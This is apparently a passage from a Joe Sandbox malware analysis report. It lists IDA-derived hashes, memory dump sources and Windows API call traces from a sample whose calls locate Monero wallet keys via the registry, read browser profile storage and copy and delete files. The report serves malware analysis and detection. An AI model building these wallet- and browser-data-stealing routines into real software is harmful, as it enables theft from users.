                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @(]w$W(]
                                • API String ID: 0-464159093
                                • Opcode ID: 0d41f8668ff8f901f22a3402aa1e18ba669d05ea1e207276a270af0aaf60ad7b
                                • Instruction ID: d81d8680d4a192d32706d276b6dee51b1550438224e26af1e06b3fc4bab08d9a
                                • Opcode Fuzzy Hash: 0d41f8668ff8f901f22a3402aa1e18ba669d05ea1e207276a270af0aaf60ad7b
                                • Instruction Fuzzy Hash: 90A2F3F36082049FE304AE2DEC8567ABBE5EF94320F1A493DEAC4C7344E63598558797
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: X"x{
                                • API String ID: 0-872755605
                                • Opcode ID: 389f24027c4d350c6bbad7dcd94a274db800ef8addc4a96906ad118e788c2845
                                • Instruction ID: d4e39ff8ea3a3e8e6fa78e9bfea9f7a199c707834ee5231bbd47c2363bc70153
                                • Opcode Fuzzy Hash: 389f24027c4d350c6bbad7dcd94a274db800ef8addc4a96906ad118e788c2845
                                • Instruction Fuzzy Hash: EF6137F3A183085BE3146E7CDC5576BBBD8EB50320F1A473DEA94D3380E92A99048296
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: D>{
                                • API String ID: 0-3988291388
                                • Opcode ID: 4194aaf9a9b94db58d2fdb1f2c6cb49f959d8cd3558e672492dd7a1f83ded129
                                • Instruction ID: 2c9fbb742e37896002ce817751b183381f83039229ea25323300d5e6d74e476f
                                • Opcode Fuzzy Hash: 4194aaf9a9b94db58d2fdb1f2c6cb49f959d8cd3558e672492dd7a1f83ded129
                                • Instruction Fuzzy Hash: C94125B36086049FE740AE2DDC4A76BBBD5EFC8360F6A853DE2C8C7740E93498458656
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @sm
                                • API String ID: 0-2878930846
                                • Opcode ID: 9a0b4a828e385f58af98db913e964d7e48dafc06539e899d905edd1da4690a57
                                • Instruction ID: e6238b613d9554b542d1937ddba2ebcaf26c102976615770e7f1e9023af9dd4d
                                • Opcode Fuzzy Hash: 9a0b4a828e385f58af98db913e964d7e48dafc06539e899d905edd1da4690a57
                                • Instruction Fuzzy Hash: F53139B25097149FD351BF29D8856AEFBF9FF98720F06481DE6C483214E6356880CB97
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5a71178b5951894e3f5aff088feffd49474d0b3ca4e01a70ca535cdc3b12d5f
                                • Instruction ID: 4b823a5e50527ffaa1be693386ca5bce282130cd1cef69129b7c774b25afde51
                                • Opcode Fuzzy Hash: d5a71178b5951894e3f5aff088feffd49474d0b3ca4e01a70ca535cdc3b12d5f
                                • Instruction Fuzzy Hash: 4941EAF3E086005FF3006E2EDD4577AB797EFD4320F1A853DEA8857744E97498068692
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fbcdf3c6315a3e1233da8d31e47c96b7691ace88c11bbdbca220a1c8c297464a
                                • Instruction ID: 0f7076ec7110edcc089407b2008d9cb8d1d9b6d6eb0feca798524379767bca44
                                • Opcode Fuzzy Hash: fbcdf3c6315a3e1233da8d31e47c96b7691ace88c11bbdbca220a1c8c297464a
                                • Instruction Fuzzy Hash: 1A415AB39182189BE7182D28DC997B7B799EB14320F1A423DEFD997780E979180486C6
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00C88636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 00C886AA
                                • StrStrA.SHLWAPI(?,0179E960), ref: 00C886CF
                                • lstrcpyn.KERNEL32(00EA93D0,?,00000000), ref: 00C886EE
                                • lstrlen.KERNEL32(?), ref: 00C88701
                                • wsprintfA.USER32 ref: 00C88711
                                • lstrcpy.KERNEL32(?,?), ref: 00C88727
                                • StrStrA.SHLWAPI(?,0179E978), ref: 00C88754
                                • lstrcpy.KERNEL32(?,00EA93D0), ref: 00C887B4
                                • StrStrA.SHLWAPI(?,0179EF30), ref: 00C887E1
                                • lstrcpyn.KERNEL32(00EA93D0,?,00000000), ref: 00C88800
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                • Opcode ID: 497ff6d6e3d5077da7a26dc4b4683865da0d582b607c58a7dbcc556da8c52197
                                • Instruction ID: ede68cfb63babe9baafe27ebb24df74751c028298889b57a1e6f06b0ebb2a853
                                • Opcode Fuzzy Hash: 497ff6d6e3d5077da7a26dc4b4683865da0d582b607c58a7dbcc556da8c52197
                                • Instruction Fuzzy Hash: C8F18D75A01119EFCB10DB68DD48AEAB7B9EF89300F148559F909F7251DB30BE09DBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C71F9F
                                • lstrlen.KERNEL32(01798908), ref: 00C71FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00C71FE3
                                • lstrlen.KERNEL32(00CA1794), ref: 00C71FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7200E
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C7201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C72042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C7204D
                                • lstrlen.KERNEL32(00CA1794), ref: 00C72058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C72075
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C72081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C720AC
                                • lstrlen.KERNEL32(?), ref: 00C720E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C72104
                                • lstrcat.KERNEL32(00000000,?), ref: 00C72112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C72139
                                • lstrlen.KERNEL32(00CA1794), ref: 00C7214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7216B
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C72177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C721A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C721D4
                                • lstrlen.KERNEL32(?), ref: 00C721EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7220A
                                • lstrcat.KERNEL32(00000000,?), ref: 00C72218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C72242
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7227F
                                • lstrlen.KERNEL32(0179D8B0), ref: 00C7228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C722B1
                                • lstrcat.KERNEL32(00000000,0179D8B0), ref: 00C722B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C722F7
                                • lstrcat.KERNEL32(00000000), ref: 00C72304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C7232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C72356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C72382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C723BF
                                • DeleteFileA.KERNEL32(00000000), ref: 00C723F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00C72444
                                • FindClose.KERNEL32(00000000), ref: 00C72453
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: 6100be7015bb4072cb895808c4853662c5a1afb521d996ce273808985b0df3df
                                • Instruction ID: 2ff32216470567cd20b778f6e12b60b3b846474e68fc3961fb9ceca750090f56
                                • Opcode Fuzzy Hash: 6100be7015bb4072cb895808c4853662c5a1afb521d996ce273808985b0df3df
                                • Instruction Fuzzy Hash: A3E13231A1121A9FCB21EFA5DD89A9E77F9EF55310F04C024F919E7212DB34EE059BA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86445
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C86480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00C864AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C864E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C8650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C86537
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: b90d9b6351bbe67363aa947420adc2b4f0a098c79860a26728ae097013d4df66
                                • Instruction ID: 5c80251383525b9f8e0fc3810f387804671386eea3f2b9dbc2a766f275c35185
                                • Opcode Fuzzy Hash: b90d9b6351bbe67363aa947420adc2b4f0a098c79860a26728ae097013d4df66
                                • Instruction Fuzzy Hash: ACF18E70A012169FCB21FF69D849AAF77B5EF44308F088128F869E7252DB34DE45CB94
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C843A3
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C843D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C843FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C84409
                                • lstrlen.KERNEL32(\storage\default\), ref: 00C84414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 00C8443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C84471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84498
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C844D7
                                • lstrcat.KERNEL32(00000000,?), ref: 00C844DF
                                • lstrlen.KERNEL32(00CA1794), ref: 00C844EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C84507
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C84513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 00C8451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00C84547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C845A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00C845A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C84601
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C84653
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C8467B
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C846AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: 0a2a1621def01499b0935c1aaddd8c8e2ae11d005f7c67f965c642ba91f7aa28
                                • Instruction ID: 3f040a66c92325ed1545d7ae45f1ab010951795f75dcaa32d3f0ab7afdcfeade
                                • Opcode Fuzzy Hash: 0a2a1621def01499b0935c1aaddd8c8e2ae11d005f7c67f965c642ba91f7aa28
                                • Instruction Fuzzy Hash: 75B19F30A112179FCB25FF79D849AAF77E8EF55318F098024B819E7252DB30EE059B94
                                APIs
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C857D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00C85804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C85868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C858C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C858D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C858F8
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C8592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C85961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85988
                                • lstrlen.KERNEL32(00CA1794), ref: 00C8599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C859B9
                                • lstrcat.KERNEL32(00000000,00CA1794), ref: 00C859C5
                                • lstrlen.KERNEL32(0179D778), ref: 00C859D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C859F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00C85A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00C85A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C85AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C85B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C85B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C85B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85BB5
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C85BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C85C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C85C70
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                • Opcode ID: 4f7f81d8750f33a206605bb6ea13e9c8681ab96803d7e630e06b6871cb93b222
                                • Instruction ID: ec3d8f15e532d920fc3469d3ab5e116e719e815d6f097dd3a3ad302e903f9601
                                • Opcode Fuzzy Hash: 4f7f81d8750f33a206605bb6ea13e9c8681ab96803d7e630e06b6871cb93b222
                                • Instruction Fuzzy Hash: 3702B171A016059FCB21FF69C889AAF7BF5EF48304F088128F819A7251DB74EE45DB94
                                APIs
                                  • Part of subcall function 00C71120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C71135
                                  • Part of subcall function 00C71120: RtlAllocateHeap.NTDLL(00000000), ref: 00C7113C
                                  • Part of subcall function 00C71120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00C71159
                                  • Part of subcall function 00C71120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00C71173
                                  • Part of subcall function 00C71120: RegCloseKey.ADVAPI32(?), ref: 00C7117D
                                • lstrcat.KERNEL32(?,00000000), ref: 00C711C0
                                • lstrlen.KERNEL32(?), ref: 00C711CD
                                • lstrcat.KERNEL32(?,.keys), ref: 00C711E8
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C7121F
                                • lstrlen.KERNEL32(01798908), ref: 00C7122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71251
                                • lstrcat.KERNEL32(00000000,01798908), ref: 00C71259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00C71264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00C71294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C712BA
                                • lstrcpy.KERNEL32(00000000,00C9CFEC), ref: 00C712FF
                                • lstrlen.KERNEL32(0179D8B0), ref: 00C7130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00C71335
                                • lstrcat.KERNEL32(00000000,?), ref: 00C7133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00C71378
                                • lstrcat.KERNEL32(00000000), ref: 00C71385
